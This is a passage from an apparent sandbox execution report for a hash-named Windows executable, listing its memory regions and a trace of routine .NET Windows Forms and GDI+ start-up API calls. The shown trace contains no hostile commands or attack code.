region_type = private
name = "private_0x000000000e370000"
filename = ""
Region:
id = 910
start_va = 0xe380000
end_va = 0xe38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000e380000"
filename = ""
Region:
id = 911
start_va = 0xe390000
end_va = 0xe39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000e390000"
filename = ""
Region:
id = 912
start_va = 0xe3a0000
end_va = 0xe3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000e3a0000"
filename = ""
Region:
id = 913
start_va = 0xe3b0000
end_va = 0xe3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000e3b0000"
filename = ""
Region:
id = 914
start_va = 0xe3c0000
end_va = 0xe3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000e3c0000"
filename = ""
Region:
id = 915
start_va = 0x6a5b0000
end_va = 0x6a5b5fff
monitored = 0
entry_point = 0x6a5b1570
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll")
Region:
id = 916
start_va = 0x71f20000
end_va = 0x7206afff
monitored = 0
entry_point = 0x71f81660
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 917
start_va = 0x670000
end_va = 0x6affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 918
start_va = 0x8b0000
end_va = 0x9affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 919
start_va = 0x21f0000
end_va = 0x21f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021f0000"
filename = ""
Region:
id = 920
start_va = 0x74360000
end_va = 0x743e3fff
monitored = 0
entry_point = 0x74386220
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 921
start_va = 0x73870000
end_va = 0x73a8bfff
monitored = 0
entry_point = 0x73a3bc40
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll")
Region:
id = 922
start_va = 0x2200000
end_va = 0x2200fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002200000"
filename = ""
Region:
id = 923
start_va = 0x2210000
end_va = 0x224ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002210000"
filename = ""
Region:
id = 924
start_va = 0x8ce0000
end_va = 0x8ddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ce0000"
filename = ""
Region:
id = 925
start_va = 0x2250000
end_va = 0x2253fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 926
start_va = 0x8de0000
end_va = 0x8e24fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db")
Region:
id = 927
start_va = 0x2260000
end_va = 0x2263fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 928
start_va = 0x8e30000
end_va = 0x8ebdfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 929
start_va = 0x8ec0000
end_va = 0x8efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008ec0000"
filename = ""
Region:
id = 930
start_va = 0x8f00000
end_va = 0x8ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f00000"
filename = ""
Region:
id = 931
start_va = 0x2270000
end_va = 0x2271fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002270000"
filename = ""
Region:
id = 932
start_va = 0x2280000
end_va = 0x2280fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002280000"
filename = ""
Region:
id = 933
start_va = 0x9000000
end_va = 0x93fafff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000009000000"
filename = ""
Region:
id = 934
start_va = 0x9400000
end_va = 0x9403fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 935
start_va = 0x9410000
end_va = 0x9422fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db"
filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db")
Region:
id = 936
start_va = 0x9430000
end_va = 0x9430fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000009430000"
filename = ""
Region:
id = 937
start_va = 0x703b0000
end_va = 0x7052dfff
monitored = 0
entry_point = 0x7042c630
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 938
start_va = 0x71af0000
end_va = 0x71dbafff
monitored = 0
entry_point = 0x71d2c4c0
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 939
start_va = 0x9400000
end_va = 0x9400fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000009400000"
filename = ""
Region:
id = 1443
start_va = 0x9440000
end_va = 0x944ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009440000"
filename = ""
Region:
id = 1496
start_va = 0x9440000
end_va = 0x947ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009440000"
filename = ""
Region:
id = 1497
start_va = 0x9480000
end_va = 0x957ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009480000"
filename = ""
Region:
id = 1504
start_va = 0x9580000
end_va = 0x95bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009580000"
filename = ""
Region:
id = 1505
start_va = 0x95c0000
end_va = 0x96bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000095c0000"
filename = ""
Region:
id = 1506
start_va = 0x96c0000
end_va = 0x97bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000096c0000"
filename = ""
Region:
id = 1507
start_va = 0x97c0000
end_va = 0x97cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000097c0000"
filename = ""
Region:
id = 1514
start_va = 0x97d0000
end_va = 0x97dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000097d0000"
filename = ""
Region:
id = 1515
start_va = 0x97d0000
end_va = 0x97dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000097d0000"
filename = ""
Region:
id = 1516
start_va = 0x97d0000
end_va = 0x97dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000097d0000"
filename = ""
Thread:
id = 1
os_tid = 0x600
[0101.006] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0103.817] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0103.817] GetLastError () returned 0x2
[0103.826] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0103.826] GetLastError () returned 0x2
[0103.833] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19eca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0103.833] GetLastError () returned 0x2
[0103.846] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0103.846] GetLastError () returned 0x2
[0103.846] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x19ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e
[0103.846] GetLastError () returned 0x2
[0103.856] GetVersionExW (in: lpVersionInformation=0x702c38*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x702c38*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0103.856] GetLastError () returned 0x2
[0103.858] GetVersionExW (in: lpVersionInformation=0x702c38*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x702c38*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0103.858] GetLastError () returned 0x2
[0107.566] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1ae
[0107.567] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1af
[0108.165] GetSystemMetrics (nIndex=75) returned 1
[0108.835] AdjustWindowRectEx (in: lpRect=0x19ee9c, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x19ee9c) returned 1
[0108.965] GetCurrentProcess () returned 0xffffffff
[0108.967] GetCurrentThread () returned 0xfffffffe
[0108.967] GetCurrentProcess () returned 0xffffffff
[0108.988] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19edcc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19edcc*=0x284) returned 1
[0108.988] GetLastError () returned 0x2
[0109.135] GetCurrentThreadId () returned 0x600
[0109.571] lstrlenW (lpString="䅁") returned 1
[0109.894] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76300000
[0109.898] GetProcAddress (hModule=0x76300000, lpProcName="DefWindowProcW") returned 0x772eaee0
[0109.902] GetStockObject (i=5) returned 0x1900015
[0109.903] GetLastError () returned 0x2
[0109.936] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0109.950] CoTaskMemAlloc (cb=0x4c) returned 0x700a10
[0109.950] RegisterClassW (lpWndClass=0x73db10) returned 0xc1de
[0109.951] GetLastError () returned 0x2
[0109.951] CoTaskMemFree (pv=0x700a10)
[0109.951] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0110.008] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.378734a", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x8027e
[0110.105] SetWindowLongW (hWnd=0x8027e, nIndex=-4, dwNewLong=1999548128) returned 37554322
[0110.153] GetWindowLongW (hWnd=0x8027e, nIndex=-4) returned 1999548128
[0110.170] lstrlenW (lpString="䅁") returned 1
[0110.172] GetVersionExW (in: lpVersionInformation=0x75c808*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x75c808*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0110.172] GetLastError () returned 0x2
[0110.215] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e41c | out: phkResult=0x19e41c*=0x288) returned 0x0
[0110.218] RegQueryValueExW (in: hKey=0x288, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x19e464, lpData=0x0, lpcbData=0x19e460*=0x0 | out: lpType=0x19e464*=0x0, lpData=0x0, lpcbData=0x19e460*=0x0) returned 0x2
[0110.218] RegQueryValueExW (in: hKey=0x288, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x19e464, lpData=0x0, lpcbData=0x19e460*=0x0 | out: lpType=0x19e464*=0x0, lpData=0x0, lpcbData=0x19e460*=0x0) returned 0x2
[0110.218] RegCloseKey (hKey=0x288) returned 0x0
[0110.279] SetWindowLongW (hWnd=0x8027e, nIndex=-4, dwNewLong=37554642) returned 1999548128
[0110.279] GetWindowLongW (hWnd=0x8027e, nIndex=-4) returned 37554642
[0110.279] GetWindowLongW (hWnd=0x8027e, nIndex=-16) returned 113311744
[0110.465] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc1dd
[0110.480] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x8027e, Msg=0x24, wParam=0x0, lParam=0x19e734) returned 0x0
[0110.483] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1d9
[0110.484] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x8027e, Msg=0x81, wParam=0x0, lParam=0x19e728) returned 0x1
[0110.485] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x8027e, Msg=0x83, wParam=0x0, lParam=0x19e714) returned 0x0
[0110.720] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x8027e, Msg=0x1, wParam=0x0, lParam=0x19e728) returned 0x0
[0110.761] GetClientRect (in: hWnd=0x8027e, lpRect=0x19e470 | out: lpRect=0x19e470) returned 1
[0110.763] GetWindowRect (in: hWnd=0x8027e, lpRect=0x19e470 | out: lpRect=0x19e470) returned 1
[0111.132] GetLastError () returned 0x6
[0111.140] GetParent (hWnd=0x8027e) returned 0x0
[0111.443] AdjustWindowRectEx (in: lpRect=0x19ec0c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec0c) returned 1
[0111.457] AdjustWindowRectEx (in: lpRect=0x19ec0c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec0c) returned 1
[0111.460] AdjustWindowRectEx (in: lpRect=0x19ec0c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec0c) returned 1
[0111.470] AdjustWindowRectEx (in: lpRect=0x19ec0c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec0c) returned 1
[0111.544] AdjustWindowRectEx (in: lpRect=0x19ec1c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec1c) returned 1
[0111.557] AdjustWindowRectEx (in: lpRect=0x19ec1c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec1c) returned 1
[0111.557] AdjustWindowRectEx (in: lpRect=0x19ec0c, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ec0c) returned 1
[0111.787] IIDFromString (in: lpsz="{7BF80980-BF32-101A-8BBB-00AA00300CAB}", lpiid=0x19eb9c | out: lpiid=0x19eb9c) returned 0x0
[0111.794] OleCreatePictureIndirect () returned 0x0
[0111.805] CPicture::QueryInterface () returned 0x0
[0111.809] CPicture::QueryInterface () returned 0x80004002
[0111.809] CPicture::QueryInterface () returned 0x80004002
[0111.810] CPicture::AddRef () returned 0x3
[0111.810] CoGetContextToken (in: pToken=0x19e1d0 | out: pToken=0x19e1d0) returned 0x0
[0111.810] CoGetContextToken (in: pToken=0x19e194 | out: pToken=0x19e194) returned 0x0
[0111.810] CObjectContext::QueryInterface () returned 0x0
[0111.811] CObjectContext::GetCurrentApartmentType () returned 0x0
[0111.811] Release () returned 0x0
[0111.811] CoGetObjectContext (in: riid=0x6c0603ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x76e9fc | out: ppv=0x76e9fc*=0x6fbb40) returned 0x0
[0111.894] CPicture::QueryInterface () returned 0x0
[0111.894] CPicture::GetUnmarshalClass () returned 0x80004005
[0111.894] Release () returned 0x3
[0111.895] CoGetContextToken (in: pToken=0x19e1c8 | out: pToken=0x19e1c8) returned 0x0
[0111.895] CPicture::AddRef () returned 0x4
[0111.895] CPicture::QueryInterface () returned 0x80004002
[0111.895] CPicture::Release () returned 0x3
[0111.895] CPicture::Release () returned 0x2
[0111.895] CoGetContextToken (in: pToken=0x19e63c | out: pToken=0x19e63c) returned 0x0
[0111.895] CoGetContextToken (in: pToken=0x19e5fc | out: pToken=0x19e5fc) returned 0x0
[0111.895] CPicture::AddRef () returned 0x3
[0111.895] CPicture::QueryInterface () returned 0x0
[0111.895] CPicture::Release () returned 0x3
[0111.895] CPicture::Release () returned 0x2
[0111.895] CPicture::Release () returned 0x1
[0111.895] CoGetContextToken (in: pToken=0x19e99c | out: pToken=0x19e99c) returned 0x0
[0111.896] IIDFromString (in: lpsz="{00000109-0000-0000-C000-000000000046}", lpiid=0x19e9d8 | out: lpiid=0x19e9d8) returned 0x0
[0111.896] CoGetContextToken (in: pToken=0x19e95c | out: pToken=0x19e95c) returned 0x0
[0111.896] CPicture::AddRef () returned 0x2
[0111.896] CPicture::QueryInterface () returned 0x0
[0111.896] CPicture::Release () returned 0x2
[0111.896] Release () returned 0x1
[0111.903] IIDFromString (in: lpsz="{0000000C-0000-0000-C000-000000000046}", lpiid=0x23d0ab8 | out: lpiid=0x23d0ab8) returned 0x0
[0111.910] CoGetContextToken (in: pToken=0x19e97c | out: pToken=0x19e97c) returned 0x0
[0111.910] CoGetContextToken (in: pToken=0x19e93c | out: pToken=0x19e93c) returned 0x0
[0111.910] CPicture::AddRef () returned 0x2
[0111.910] CPicture::QueryInterface () returned 0x0
[0111.910] CPicture::Release () returned 0x2
[0111.911] AddRef () returned 0x3
[0111.911] CPicture::Load () returned 0x0
[0111.961] Release () returned 0x2
[0111.967] CoGetContextToken (in: pToken=0x19ea30 | out: pToken=0x19ea30) returned 0x0
[0111.967] CoGetContextToken (in: pToken=0x19e9f0 | out: pToken=0x19e9f0) returned 0x0
[0111.967] CPicture::AddRef () returned 0x3
[0111.967] CPicture::QueryInterface () returned 0x0
[0111.968] CPicture::Release () returned 0x3
[0111.968] CPicture::AddRef () returned 0x4
[0111.968] CPicture::get_Type () returned 0x0
[0111.968] CPicture::Release () returned 0x3
[0111.971] CPicture::get_Handle () returned 0x0
[0112.117] GetSystemMetrics (nIndex=13) returned 32
[0112.117] GetSystemMetrics (nIndex=14) returned 32
[0112.119] GetIconInfo (in: hIcon=0x30221, piconinfo=0x272b344 | out: piconinfo=0x272b344) returned 1
[0112.122] GetObjectW (in: h=0x8f050567, c=24, pv=0x272b360 | out: pv=0x272b360) returned 24
[0112.122] GetLastError () returned 0x0
[0112.123] DeleteObject (ho=0x8f050567) returned 1
[0112.123] GetLastError () returned 0x0
[0112.130] CopyImage (h=0x30221, type=0x2, cx=32, cy=32, flags=0x0) returned 0x700fb
[0112.134] CoGetContextToken (in: pToken=0x19ea48 | out: pToken=0x19ea48) returned 0x0
[0112.134] CPicture::Release () returned 0x2
[0112.135] IUnknown:Release (This=0x6fbb40) returned 0x0
[0112.135] Release () returned 0x1
[0112.135] CPicture::Release () returned 0x0
[0112.165] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0112.284] GetCurrentProcessId () returned 0xaf0
[0112.284] GetLastError () returned 0x0
[0112.288] FindAtomW (lpString="GDI+Atom_2800_1") returned 0x0
[0112.288] GetLastError () returned 0x2
[0112.291] AddAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0112.291] GetLastError () returned 0x2
[0112.896] GdiplusStartup (in: token=0x22e6d6c, input=0x73daf8, output=0x19e3f8 | out: token=0x22e6d6c, output=0x19e3f8) returned 0x0
[0112.900] GetLastError () returned 0x0
[0113.437] GdipCreateFontFamilyFromName (name="Capture it", fontCollection=0x0, fontFamily=0x19ebf0) returned 0xe
[0114.230] GetLastError () returned 0x7a
[0114.283] GdipGetGenericFontFamilySansSerif (nativeFamily=0x19ebe0) returned 0x0
[0114.283] GetLastError () returned 0x7a
[0114.343] GdipCreateFont (fontFamily=0x11111111, emSize=0x41d20000, style=1, unit=0x3, font=0x272b47c) returned 0x0
[0114.744] GetLastError () returned 0x0
[0114.756] GdipGetFontSize (font=0x546ef98, size=0x272b480) returned 0x0
[0114.800] GetLastError () returned 0x0
[0115.215] GetSystemDefaultLCID () returned 0x409
[0115.215] GetLastError () returned 0x0
[0115.217] GetStockObject (i=17) returned 0x10a0047
[0115.217] GetLastError () returned 0x0
[0115.287] GetObjectW (in: h=0x10a0047, c=92, pv=0x73db10 | out: pv=0x73db10) returned 92
[0115.288] GetLastError () returned 0x0
[0115.326] GetDC (hWnd=0x0) returned 0xb010541
[0115.327] GetLastError () returned 0x0
[0115.526] GdipCreateFontFromLogfontW (hdc=0xb010541, logfont=0x73db10, font=0x19eb70) returned 0x0
[0115.570] GetLastError () returned 0x0
[0115.637] GdipGetFontUnit (font=0x546efc0, unit=0x19eb44) returned 0x0
[0115.638] GetLastError () returned 0x7f
[0115.638] GdipGetFontSize (font=0x546efc0, size=0x19eb48) returned 0x0
[0115.638] GetLastError () returned 0x7f
[0115.640] GdipGetFontStyle (font=0x546efc0, style=0x19eb40) returned 0x0
[0115.640] GetLastError () returned 0x7f
[0115.643] GdipGetFamily (font=0x546efc0, family=0x19eb3c) returned 0x0
[0115.643] GetLastError () returned 0x7f
[0115.647] GdipGetFontSize (font=0x546efc0, size=0x272bbd0) returned 0x0
[0115.647] GetLastError () returned 0x7f
[0115.678] ReleaseDC (hWnd=0x0, hDC=0xb010541) returned 1
[0115.678] GetLastError () returned 0x7f
[0115.796] GetDC (hWnd=0x0) returned 0xb010541
[0115.797] GetLastError () returned 0x7f
[0115.935] GdipCreateFromHDC (hdc=0xb010541, graphics=0x19eb64) returned 0x0
[0115.959] GetLastError () returned 0x7f
[0115.982] GdipGetDpiY (graphics=0x657f268, dpi=0x272bce4) returned 0x0
[0115.982] GetLastError () returned 0x7f
[0115.993] GdipGetFontHeight (font=0x546efc0, graphics=0x657f268, height=0x19eb5c) returned 0x0
[0115.994] GetLastError () returned 0x7f
[0116.003] GdipGetEmHeight (family=0x6574b40, style=0, EmHeight=0x19eb64) returned 0x0
[0116.067] GetLastError () returned 0x7f
[0116.078] GdipGetLineSpacing (family=0x6574b40, style=0, LineSpacing=0x19eb64) returned 0x0
[0116.078] GetLastError () returned 0x7f
[0116.454] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0116.455] GetLastError () returned 0x7f
[0116.460] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0116.470] GetLastError () returned 0x7f
[0116.470] ReleaseDC (hWnd=0x0, hDC=0xb010541) returned 1
[0116.470] GetLastError () returned 0x7f
[0116.477] GdipCreateFont (fontFamily=0x6574b40, emSize=0x41040000, style=0, unit=0x3, font=0x272bc98) returned 0x0
[0116.477] GetLastError () returned 0x7f
[0116.478] GdipGetFontSize (font=0x657af30, size=0x272bc9c) returned 0x0
[0116.478] GetLastError () returned 0x7f
[0116.485] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0116.485] GetLastError () returned 0x7f
[0116.487] GdipDeleteFont (font=0x546efc0) returned 0x0
[0116.487] GetLastError () returned 0x7f
[0116.630] AdjustWindowRectEx (in: lpRect=0x19eba8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eba8) returned 1
[0116.653] GetProcessWindowStation () returned 0xf0
[0116.654] GetUserObjectInformationA (in: hObj=0xf0, nIndex=1, pvInfo=0x272c4bc, nLength=0xc, lpnLengthNeeded=0x19ea90 | out: pvInfo=0x272c4bc, lpnLengthNeeded=0x19ea90) returned 1
[0116.655] GetLastError () returned 0x7f
[0116.658] SetConsoleCtrlHandler (HandlerRoutine=0x23d0fca, Add=1) returned 1
[0116.659] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0116.659] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0116.664] GetClassInfoW (in: hInstance=0x400000, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", lpWndClass=0x272c504 | out: lpWndClass=0x272c504) returned 0
[0116.668] CoTaskMemAlloc (cb=0x58) returned 0x783fb0
[0116.668] RegisterClassW (lpWndClass=0x73db10) returned 0xc1d7
[0116.669] GetLastError () returned 0x583
[0116.669] CoTaskMemFree (pv=0x783fb0)
[0116.670] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", lpWindowName=".NET-BroadcastEventWindow.2.0.0.0.378734a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x50308
[0116.672] NtdllDefWindowProc_W (hWnd=0x50308, Msg=0x81, wParam=0x0, lParam=0x19e508) returned 0x1
[0116.676] NtdllDefWindowProc_W (hWnd=0x50308, Msg=0x83, wParam=0x0, lParam=0x19e4f4) returned 0x0
[0116.676] NtdllDefWindowProc_W (hWnd=0x50308, Msg=0x1, wParam=0x0, lParam=0x19e508) returned 0x0
[0116.677] NtdllDefWindowProc_W (hWnd=0x50308, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0
[0116.677] NtdllDefWindowProc_W (hWnd=0x50308, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0
[0116.677] GetLastError () returned 0x0
[0116.715] GetSysColor (nIndex=10) returned 0xb4b4b4
[0116.715] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=2) returned 0xd1b499
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=9) returned 0x0
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=12) returned 0xababab
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=15) returned 0xf0f0f0
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=20) returned 0xffffff
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=16) returned 0xa0a0a0
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=15) returned 0xf0f0f0
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=16) returned 0xa0a0a0
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=21) returned 0x696969
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=22) returned 0xe3e3e3
[0116.718] GetLastError () returned 0x0
[0116.718] GetSysColor (nIndex=20) returned 0xffffff
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=18) returned 0x0
[0116.719] GetLastError () returned 0x0
[0116.719] GetSysColor (nIndex=1) returned 0x0
